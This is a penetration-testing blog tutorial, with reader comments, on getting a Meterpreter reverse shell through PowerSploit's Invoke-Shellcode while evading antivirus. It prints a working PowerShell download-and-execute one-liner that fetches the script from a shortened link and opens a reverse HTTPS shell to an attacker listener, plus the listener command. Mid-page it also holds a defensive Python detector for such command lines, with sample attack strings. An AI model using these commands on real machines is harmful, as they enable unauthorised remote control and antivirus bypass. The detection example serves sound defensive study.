PowerSploit: The Easiest Shell You'll Ever Get - Pentest Geek

PowerSploit: The Easiest Shell You’ll Ever Get

Author: Chris Campbell | Posted In: Penetration Testing Tutorials | On: 2013/09/18 | Comments: 5

Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.

PowerSploit is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is used by other awesome tools like SET, so you may already be using it! Many of the scripts in the project are extremely useful for post-exploitation in Windows environments. The PowerSploit project was started by Matt Graeber, who is the author of the function we will use in this tutorial: Invoke-Shellcode.

In order for PowerSploit to work, the target machine must have PowerShell installed and internet access. The first step is to set up our handler on our attacker box. This is something we will likely do often, so let’s automate it with a really simple Python script:

[Image: script]

To start the multi/handler and configure it for PowerSploit, we just run the script:

python StartListener.py 192.168.0.15 443

Now that our handler is ready, we can move on to executing our shell. To make the next step easier to type, the first thing I did was shorten the GitHub link to Invoke-Shellcode with bitly:

[Image: bitly]

Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command creates a .NET WebClient object to download the PowerSploit function and passes the result to Invoke-Expression to load it into memory:

IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c')

Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:

Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.15 -Lport 443 -Force

We can actually combine these into a single command to execute our shell:

IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.0.1.200 -Lport 443 -Force

[Image: powershell]
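For defenders, the one-liner above leaves a recognisable trace wherever PowerShell command lines or script blocks are logged (process-creation events, script block logging). The following is an added example, not code from the original post: a small Python classifier for such log lines, in which the rule names, sample lines, host name and addresses are all constructed for illustration.

```python
import base64
import re

# PowerShell accepts typographic dashes and quotes in place of ASCII ones (the
# commands on this page were published with them), so fold them before matching.
_FOLD = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-",
                       "\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})

RULES = {  # hypothetical rule names chosen for this example
    "web_download": re.compile(r"net\.webclient|\.download(?:string|data|file)\s*\(", re.I),
    "dynamic_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "shellcode_injection": re.compile(r"\binvoke-shellcode\b", re.I),
}
# -EncodedCommand and its common abbreviations (-e, -ec, -enc, ...) followed by base64
_ENC = re.compile(r"-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand(command):
    """Return the folded command plus any decoded -EncodedCommand payloads."""
    texts = [command.translate(_FOLD)]
    for blob in _ENC.findall(texts[0]):
        try:  # -EncodedCommand carries base64 of UTF-16LE text
            decoded = base64.b64decode(blob, validate=True).decode("utf-16-le")
            texts.append(decoded.translate(_FOLD))
        except ValueError:
            pass  # not a valid encoded command; keep only the raw text
    return texts

def classify(command):
    """Return the sorted rule names that fire for one logged command line."""
    hits = set()
    for text in expand(command):
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    if {"web_download", "dynamic_eval"} <= hits:
        hits.add("download_cradle")  # fetch-and-execute in a single command
    return sorted(hits)

SAMPLES = [  # constructed log lines; example.test and 192.0.2.10 are placeholders
    "powershell.exe IEX (New-Object Net.WebClient).DownloadString(\u2018http://example.test/a.ps1\u2019); "
    "Invoke-Shellcode \u2013Payload windows/meterpreter/reverse_https \u2013Lhost 192.0.2.10 \u2013Lport 443 \u2013Force",
    "powershell.exe -NoProfile -enc " + base64.b64encode(
        "iex (new-object net.webclient).downloadstring('http://example.test/a.ps1')"
        .encode("utf-16-le")).decode(),
    "powershell.exe -NoProfile Get-ChildItem C:\\Users -ErrorAction SilentlyContinue",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line) or ["clean"], "<-", line[:60])
```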

Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:

[Image: meterpreter]

That is the easiest and most convenient AV-bypass I have ever seen! Just open PowerShell and type a command. Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier. You can find more ways at my blog and by following me on Twitter. Also, join me at Derbycon, where I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall, and about how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber. I hope to see you all there!

-Chris


5 Comments
  • Uhhhhhhhhh…..

    Why did you put your IP in that server start command? Cause…. That’s REALLY not secure.

    *I think it should be “127.0.0.1 443” which is the local host address.

    -McFlyAF

  • Hi,
    Actually tried your trick, it did not work, -Payload doesn’t exist after reading raw shell code from GitHub! Maybe it changed?

  • Something terrible may have just happened and you have no idea what because you
    just arbitrarily download crap from the Internet and execute it.
    At line:53 char:6
    + throw <<<< 'Something terrible may have just happened and you have no idea w
    hat because you just arbitrarily download crap from the Internet and execute it
    .'
    + CategoryInfo : OperationStopped: (Something terri…and execute
    it.:String) [], RuntimeException
    + FullyQualifiedErrorId : Something terrible may have just happened and yo
    u have no idea what because you just arbitrarily download crap from the In
    ternet and execute it.

  • Anthony Esdaile 2014/12/17 at 8:02 PM

    Really impresses me seeing someone use PowerShell for pen testing. I just wish there were more people, as this subject seems to be pretty scarce within the PowerShell community.

    Any more good resources you can recommend?

  • I thought it was awesome that PowerShell will download a webpage and store it as a string that you could later execute, so I wrote a quick script based off this. It will allow you to pick a URL where a PowerShell script is held and then execute it. Or it will host a script on a basic Ruby webserver that can be either HTTP or HTTPS.

    https://github.com/b00stfr3ak/fast_meterpreter
